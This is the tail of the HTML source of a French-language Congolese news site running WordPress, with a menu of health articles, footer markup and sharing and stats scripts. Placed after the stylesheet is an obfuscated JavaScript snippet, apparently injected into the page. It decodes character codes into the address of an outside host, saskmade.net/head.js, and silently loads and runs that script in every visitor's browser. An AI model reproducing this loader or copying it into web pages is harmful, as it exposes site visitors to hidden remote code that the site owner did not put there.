	<li id="menu-item-0" class="menu-item-0"><a><div class="td-mega-grid"><script>var block_td_uid_1_5be8e23de0528 = new td_block();
block_td_uid_1_5be8e23de0528.id = "td_uid_1_5be8e23de0528";
block_td_uid_1_5be8e23de0528.atts = '{"limit":"5","td_column_number":3,"ajax_pagination":"next_prev","category_id":"11","show_child_cat":"5"}';
block_td_uid_1_5be8e23de0528.td_cur_cat = "11";
block_td_uid_1_5be8e23de0528.td_column_number = "1";
block_td_uid_1_5be8e23de0528.block_type = "td_mega_menu";
block_td_uid_1_5be8e23de0528.post_count = "5";
block_td_uid_1_5be8e23de0528.found_posts = "75";
block_td_uid_1_5be8e23de0528.max_num_pages = "15";
block_td_uid_1_5be8e23de0528.header_color = "";
block_td_uid_1_5be8e23de0528.ajax_pagination_infinite_stop = "";
td_blocks.push(block_td_uid_1_5be8e23de0528);
</script><div class="td_block_wrap td_block_mega_menu td-no-subcats"><div id=td_uid_1_5be8e23de0528 class="td_block_inner animated fadeInDown">
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/sexposant-au-danger-de-la-consommation-de-la-cigarette-les-fumeurs-defient-lindication-fumer-est-prejudiciable-a-la-sante/" rel="bookmark" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i2.wp.com/groupelavenir.org/wp-content/uploads/2018/08/7-11.png?resize=198%2C143&#038;ssl=1" alt="" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/sexposant-au-danger-de-la-consommation-de-la-cigarette-les-fumeurs-defient-lindication-fumer-est-prejudiciable-a-la-sante/" rel="bookmark" title="S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »">S’exposant au danger de la consommation de la cigarette: Les fumeurs défient l’indication «  fumer est préjudiciable à la santé »</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/rdc-la-vaccination-anti-ebola-demarre-ce-lundi-a-lequateur/" rel="bookmark" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2018/05/ebola-liberia-woma_3045794k-e1458811890956.jpg?resize=198%2C143&#038;ssl=1" alt="" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/rdc-la-vaccination-anti-ebola-demarre-ce-lundi-a-lequateur/" rel="bookmark" title="RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur">RDC: la vaccination  anti-Ebola démarre ce lundi à l’Équateur</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/la-couverture-sanitaire-universelle-un-projet-qui-appelle-un-engagement-de-tous-oly-ilunga/" rel="bookmark" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i0.wp.com/groupelavenir.org/wp-content/uploads/2018/04/oly-ilunga.jpg?resize=198%2C143&#038;ssl=1" alt="" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/la-couverture-sanitaire-universelle-un-projet-qui-appelle-un-engagement-de-tous-oly-ilunga/" rel="bookmark" title="« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)">« La couverture sanitaire universelle », un projet qui appelle un engagement de tous (Oly Ilunga)</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/1er-decembre-2017-onusida-rappelle-le-droit-a-la-sante/" rel="bookmark" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé"><img width="198" height="143" itemprop="image" class="entry-thumb" src="https://i1.wp.com/groupelavenir.org/wp-content/uploads/2017/12/sida.jpg?resize=198%2C143&#038;ssl=1" alt="" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé"/></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/1er-decembre-2017-onusida-rappelle-le-droit-a-la-sante/" rel="bookmark" title="1er décembre 2017 : ONUSIDA rappelle le droit à la santé">1er décembre 2017 : ONUSIDA rappelle le droit à la santé</a></h4>            </div>
        </div>
        
        <div class="td_mod_mega_menu">
            <div class="thumb-wrap"><a href="https://groupelavenir.org/kinshasa-jica-en-visite-a-linpess/" rel="bookmark" title="Kinshasa : JICA en visite à l’INPESS"><img width="198" height="143" itemprop="image" class="entry-thumb" src="" /></a></div>            <div class="item-details">
                <h4 itemprop="name" class="entry-title"><a itemprop="url" href="https://groupelavenir.org/kinshasa-jica-en-visite-a-linpess/" rel="bookmark" title="Kinshasa : JICA en visite à l’INPESS">Kinshasa : JICA en visite à l’INPESS</a></h4>            </div>
        </div>
        </div><div class="td-next-prev-wrap"><a href="#" class="td_ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5be8e23de0528" data-td_block_id="td_uid_1_5be8e23de0528"></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5be8e23de0528" data-td_block_id="td_uid_1_5be8e23de0528"></a></div><div class="clearfix"></div></div> <!-- ./block1 --></div></a></li>
</ul>
</li>
</ul></div>                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>


</div>
<!--/#inner-wrap-->
</div>
<!--/#outer-wrap-->

<div class="td-sp td-scroll-up"></div>


<!--Plugin WP Overview (lite) 2011.0723.2011 Active-->

	<div style="display:none">
	</div>


    <!--

        Theme: Newspaper by tagDiv 2014
        Version: 4.6.2 (rara)
        Deploy mode: deploy
        
        uid: 5be8e23de63ca
    -->

    
            <style type="text/css" media="screen">
                ul.newsholder{
top:0!important;
}

.widget_listcategorypostswidget li{
margin-bottom:10px;
}

.widget_listcategorypostswidget li a:nth-child(1){
display:inline-block;
width:40%;
float:right;
}
                </style><script type="text/javascript">var _0x1e35=['length','fromCharCode','createElement','type','async','code121','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e35,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e35[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x73,0x61,0x73,0x6b,0x6d,0x61,0x64,0x65,0x2e,0x6e,0x65,0x74,0x2f,0x68,0x65,0x61,0x64,0x2e,0x6a,0x73,0x3f,0x76,0x65,0x72,0x3d,0x31,0x2e,0x30,0x2e,0x30);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script>
	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/groupelavenir.org\/implication-du-premier-ministre-ou-des-ministres-dans-la-campagne-electorale-de-shadary-la-mp-denonce-une-polemique-malsaine-et-perverse\/":52836};
	</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script>
<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201846'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2018Novaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/themes/Newspaper/js/td_external.js?ver=4.6.2'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/themes/Newspaper/js/full_compact/site.js?ver=4.6.2'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/lazy-images/js/lazy-images.min.js?ver=6.3.3'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://groupelavenir.org/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://groupelavenir.org/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.3.3'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>

<!-- JS generated by theme -->

<script>
    
</script>

<script type='text/javascript' src='https://stats.wp.com/e-201846.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.3.3',blog:'149877604',post:'52836',tz:'1',srv:'groupelavenir.org'} ]);
	_stq.push([ 'clickTrackerInit', '149877604', '52836' ]);
</script>
</body>
</html>